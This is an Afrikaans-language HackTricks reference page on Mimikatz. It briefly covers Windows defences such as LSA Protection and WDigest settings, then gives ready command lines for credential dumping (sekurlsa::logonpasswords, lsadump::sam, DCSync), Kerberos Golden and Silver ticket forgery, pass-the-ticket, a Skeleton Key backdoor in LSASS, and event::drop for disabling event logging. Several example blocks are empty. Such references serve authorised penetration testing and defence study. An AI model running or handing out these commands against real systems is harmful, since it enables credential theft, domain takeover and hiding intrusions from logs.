Mimikatz
Last updated
Last updated
Leer & oefen AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE) Leer & oefen GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Verdiep jou kundigheid in Mobiele Sekuriteit met 8kSec Akademie. Meester iOS en Android sekuriteit deur ons self-gebaseerde kursusse en kry gesertifiseer:
Hierdie bladsy is gebaseer op een van adsecurity.org. Kyk na die oorspronklike vir verdere inligting!
Vanaf Windows 8.1 en Windows Server 2012 R2 is beduidende maatreëls geïmplementeer om teen kredietbewysdiefstal te beskerm:
LM hashes en duidelike teks wagwoorde word nie meer in geheue gestoor om sekuriteit te verbeter nie. 'n Spesifieke registrasie instelling, HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest "UseLogonCredential" moet geconfigureer word met 'n DWORD waarde van 0
om Digest Authentication te deaktiveer, wat verseker dat "duidelike teks" wagwoorde nie in LSASS gegee word nie.
LSA Beskerming word bekendgestel om die Plaaslike Sekuriteitsowerheid (LSA) proses te beskerm teen ongemagtigde geheue lees en kode inspuiting. Dit word bereik deur die LSASS as 'n beskermde proses te merk. Aktivering van LSA Beskerming behels:
Die registrasie te wysig by HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa deur RunAsPPL
op dword:00000001
te stel.
'n Groep Beleidsobjek (GPO) te implementeer wat hierdie registrasie verandering oor bestuurde toestelle afdwing.
Ten spyte van hierdie beskermings, kan gereedskap soos Mimikatz LSA Beskerming omseil deur spesifieke bestuurders te gebruik, alhoewel sulke aksies waarskynlik in gebeurtenislogs aangeteken sal word.
Administrateurs het tipies SeDebugPrivilege, wat hulle in staat stel om programme te debugeer. Hierdie voorreg kan beperk word om ongemagtigde geheue dumps te voorkom, 'n algemene tegniek wat deur aanvallers gebruik word om kredietbewyse uit geheue te onttrek. Maar, selfs met hierdie voorreg verwyder, kan die TrustedInstaller rekening steeds geheue dumps uitvoer deur 'n aangepaste dienskonfigurasie:
Dit stel die dumping van die lsass.exe
geheue na 'n lêer in, wat dan op 'n ander stelsel ontleed kan word om kredensiale te onttrek:
Event log manipulasie in Mimikatz behels twee primêre aksies: die skoonmaak van gebeurtenislogs en die patching van die Gebeurtenisdienste om die registrasie van nuwe gebeurtenisse te voorkom. Hieronder is die opdragte om hierdie aksies uit te voer:
Opdrag: Hierdie aksie is daarop gemik om die gebeurtenislogs te verwyder, wat dit moeiliker maak om kwaadwillige aktiwiteite te volg.
Mimikatz bied nie 'n direkte opdrag in sy standaard dokumentasie vir die skoonmaak van gebeurtenislogs direk via sy opdraglyn nie. Dit behels egter tipies die gebruik van stelsels gereedskap of skripte buite Mimikatz om spesifieke logs skoon te maak (bv. met PowerShell of Windows Event Viewer).
Opdrag: event::drop
Hierdie eksperimentele opdrag is ontwerp om die gedrag van die Gebeurtenisregistrasiediens te wysig, wat effektief voorkom dat dit nuwe gebeurtenisse opneem.
Voorbeeld: mimikatz "privilege::debug" "event::drop" exit
Die privilege::debug
opdrag verseker dat Mimikatz met die nodige voorregte werk om stelseldienste te wysig.
Die event::drop
opdrag patch dan die Gebeurtenisregistrasiediens.
'n Goue Teken stel in staat tot domein-wye toegang impersonasie. Sleutelopdrag en parameters:
Opdrag: kerberos::golden
Parameters:
/domain
: Die domeinnaam.
/sid
: Die domein se Veiligheidsidentifiseerder (SID).
/user
: Die gebruikersnaam om te impersonate.
/krbtgt
: Die NTLM-hash van die domein se KDC-diensrekening.
/ptt
: Injekting van die teken direk in geheue.
/ticket
: Stoor die teken vir later gebruik.
Voorbeeld:
Silver Tickets bied toegang tot spesifieke dienste. Sleutelopdrag en parameters:
Opdrag: Soortgelyk aan Golden Ticket, maar teiken spesifieke dienste.
Parameters:
/service
: Die diens om te teiken (bv., cifs, http).
Ander parameters soortgelyk aan Golden Ticket.
Voorbeeld:
Trust Tickets word gebruik om toegang tot hulpbronne oor domeine te verkry deur vertrouensverhoudings te benut. Sleutelopdrag en parameters:
Opdrag: Soortgelyk aan Golden Ticket, maar vir vertrouensverhoudings.
Parameters:
/target
: Die FQDN van die teiken-domein.
/rc4
: Die NTLM-hash vir die vertrouensrekening.
Voorbeeld:
Lys Kaartjies:
Opdrag: kerberos::list
Lys alle Kerberos kaartjies vir die huidige gebruikersessie.
Gee die Kas:
Opdrag: kerberos::ptc
Spuit Kerberos kaartjies uit kaslêers in.
Voorbeeld: mimikatz "kerberos::ptc /ticket:ticket.kirbi" exit
Gee die Kaartjie:
Opdrag: kerberos::ptt
Laat toe om 'n Kerberos kaartjie in 'n ander sessie te gebruik.
Voorbeeld: mimikatz "kerberos::ptt /ticket:ticket.kirbi" exit
Verwyder Kaartjies:
Opdrag: kerberos::purge
Verwyder alle Kerberos kaartjies uit die sessie.
Nuttig voor die gebruik van kaartjie manipulasie opdragte om konflikte te vermy.
DCShadow: Tydelik 'n masjien laat optree as 'n DC vir AD objek manipulasie.
mimikatz "lsadump::dcshadow /object:targetObject /attribute:attributeName /value:newValue" exit
DCSync: Naboots 'n DC om wagwoorddata aan te vra.
mimikatz "lsadump::dcsync /user:targetUser /domain:targetDomain" exit
LSADUMP::LSA: Trek krediete uit LSA.
mimikatz "lsadump::lsa /inject" exit
LSADUMP::NetSync: Naboots 'n DC met 'n rekenaarrekening se wagwoorddata.
Geen spesifieke opdrag verskaf vir NetSync in oorspronklike konteks.
LSADUMP::SAM: Toegang tot plaaslike SAM databasis.
mimikatz "lsadump::sam" exit
LSADUMP::Secrets: Ontsleutel geheime wat in die register gestoor is.
mimikatz "lsadump::secrets" exit
LSADUMP::SetNTLM: Stel 'n nuwe NTLM-hash vir 'n gebruiker in.
mimikatz "lsadump::setntlm /user:targetUser /ntlm:newNtlmHash" exit
LSADUMP::Trust: Verkry vertrouensverifikasie-inligting.
mimikatz "lsadump::trust" exit
MISC::Skeleton: Spuit 'n agterdeur in LSASS op 'n DC.
mimikatz "privilege::debug" "misc::skeleton" exit
PRIVILEGE::Backup: Verkry rugsteunregte.
mimikatz "privilege::backup" exit
PRIVILEGE::Debug: Verkry debug regte.
mimikatz "privilege::debug" exit
SEKURLSA::LogonPasswords: Wys krediete vir ingelogde gebruikers.
mimikatz "sekurlsa::logonpasswords" exit
SEKURLSA::Tickets: Trek Kerberos kaartjies uit geheue.
mimikatz "sekurlsa::tickets /export" exit
SID::add/modify: Verander SID en SIDHistory.
Voeg by: mimikatz "sid::add /user:targetUser /sid:newSid" exit
Wysig: Geen spesifieke opdrag vir wysiging in oorspronklike konteks.
TOKEN::Elevate: Naboots tokens.
mimikatz "token::elevate /domainadmin" exit
TS::MultiRDP: Laat meerdere RDP sessies toe.
mimikatz "ts::multirdp" exit
TS::Sessions: Lys TS/RDP sessies.
Geen spesifieke opdrag verskaf vir TS::Sessions in oorspronklike konteks.
Trek wagwoorde uit Windows Kluis.
mimikatz "vault::cred /patch" exit